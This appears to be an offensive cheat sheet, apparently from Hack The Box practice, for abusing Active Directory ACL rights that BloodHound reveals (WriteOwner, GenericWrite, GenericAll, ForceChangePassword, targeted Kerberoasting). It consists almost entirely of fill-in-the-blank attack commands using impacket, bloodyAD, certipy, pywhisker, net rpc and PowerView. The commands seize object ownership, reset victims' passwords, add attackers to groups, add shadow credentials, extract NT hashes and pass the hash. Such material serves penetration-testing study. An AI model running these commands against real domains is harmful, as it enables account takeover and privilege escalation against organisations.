Abuse ACL

Abuse Access Control List (ACL), attacks on paths shown by bloodhound.

From HTB

WriteOwner

The WriteOwner permission is a special ACE that lets a user change the ownership of an object. If the WriteOwner permission granted on an object, we can change the owner of that object to ourselves or another account we control. Once compromised, we gain full control over the object, allowing us to: Modify permissions to grant ourselves additional privileges. Change sensitive properties like resetting the account's password. In an attack scenario, an attacker with WriteOwner on a user account (such as a privileged account) can take ownership of that account, reset its password, and effectively take over the account to escalate privileges.

Remotely

With impacket-owneredit

owneredit.py -dc-ip <DC> -action write -new-owner <USER> -target '<TARGET/OBJECT>' <DOMAIN>/<USER>:<PASS>

Or with bloodyAD

bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> set owner <TARGET/OBJECT> <USER>

Now, to abuse ownership of a group object, we can modifying the rights with impacket-dacledit. Give user WriteMembers permissions (allows user to add or remove members in the target group)

dacledit.py -action 'write' -rights 'WriteMembers' -principal <USER> -target-dn '<groupDistinguidedName>' <DOMAIN>/<USER>:<PASS> -dc-ip <DC>
# dacledit.py 'AAA.BBB'/'alex':'mypass' -action write -rights WriteMembers -principal 'alex' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=AAAA,DC=BBB' -dc-ip 0.0.0.0

This step effectively allows us to be granted with any privileges or access rights associated with the target group.

Finally, you can add members to the group

net rpc group addmem <TargetGroup> <USER> -U <DOMAIN>/<USER>%<PASS> -S <DC>

and verify that the user was successfully added to the group

net rpc group members <TargetGroup> -U <DOMAIN>/<USER>%<PASS> -S <DC>

Alternatively, we can use genericAll permissions to change the user's password.

bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> set owner '<VICTIM>' '<ATTACKER>'
bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> add genericAll '<VICTIM>' '<ATTACKER>'
bloodyAD --host <DC> -d <DOMAIN> -u <USER> -p <PASS> set password '<VICTIM>' '<NEW_PASSWORD>'

GenericWrite

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user.

Remotely

Remotely 1

With Certipy

certipy shadow auto -username <USER>@<DOMAIN> -p <PASS> -account <TARGET_ACCOUNT> -dc-ip <DC>

certipy shadow auto -username <USER>@<DOMAIN> -hashes <HASH> -account <TARGET_ACCOUNT> -dc-ip <DC>

Remotely 2

By abusing GenericWrite permissions, we added with pyWhisker a certificate to the target account as an alternative authentication method.

pywhisker.py -d <DOMAIN> -u <USER> -p <PASS> --target <TARGET_ACCOUNT> --action "add" --dc-ip <DC>
# take note of password

This certificate can then be used with gettgtpkinit to request a Kerberos TGT as target, giving control over that account.

Synchronize time with domain controller with ntpdate or rdate.

sudo ntpdate <IP_DC>

gettgtpkinit.py <DOMAIN>/<TARGET_ACCOUNT> -cert-pfx <PFX_FILE> -pfx-pass <PFX_PASS> -dc-ip <DC> <NAME_OUTPUT>
# take note of key

Get hash of tgt with getnthash

export KRB5CCNAME=<NAME_OUTPUT>
getnthash.py -key <KEY> -dc-ip <IP> <DOMAIN>/<TARGET_ACCOUNT>

Locally

$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)
$newPassword = ConvertTo-SecureString '<NEW_PASSWORD>' -AsPlainText -Force

with PowerView (old and new)

Import-Module .\PowerView.ps1
Set-DomainUserPassword -Identity <TARGET_USER> -AccountPassword $newPassword -Credential $Cred -Verbose

GenericAll

GenericAll to a user

Remotely

Allows us to modify properties and have control of a user. We can reset the password of the user without knowing their current one.

net rpc password <TAGET> <NEW_PASS> -U <DOMAIN>/<USER>%<PASS> -S <DC>

Or with bloodyAD (PtH)

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS or :HASH> set password "<TARGET>" "<NEW-PASS>"

GenericAll to a group

Remotely

Allows us to add members to that group.

net rpc group addmem "<GROUP>" "<UserTarget>" <DOMAIN>/<USER>%<PASS> -S <DC>

Or with bloodyAD (PtH)

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS or :HASH> add groupMember "<GROUP>" "<UserTarget>"

Locally

Net group "<GROUP>" <USER> /add /domain

$SecPassword = ConvertTo-SecureString '<PASSWORD>' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('<DOMAIN>\<USER>', $SecPassword)

with PowerView (old and new)

Import-Module .\PowerView.ps1
Add-DomainGroupMember -Identity '<GROUP>' -Members '<TARGET>' -Credential $Cred -Verbose

Check

Get-DomainGroupMember -Identity "<GROUP>" | Select MemberName

ForceChangePassword

Remotely

net rpc password <TAGET> <NEW_PASS> -U <DOMAIN>/<USER>%<PASS> -S <DC>

Or with bloodyAD (PtH)

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS or :HASH> set password "<TARGET>" "<NEW-PASS>"

Targeted Kerberoasting

With GenericAll, GenericWrite, WriteProperty or Validated-SPN.

Note

sudo timedatectl set-ntp false                                                                           
sudo ntpdate <IP>

Modify Attribute with bloodyAD.

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS> get object "<ex.USER>"
# ...
# userAccountControl: ACCOUNTDISABLE; NORMAL_ACCOUNT        (value:2)

bloodyAD --host <IP> -d <DOMAIN> -u <USER> -p <PASS> set object "<ex.USER>" userAccountControl -v '512' -h
# ...
# userAccountControl: NORMAL_ACCOUNT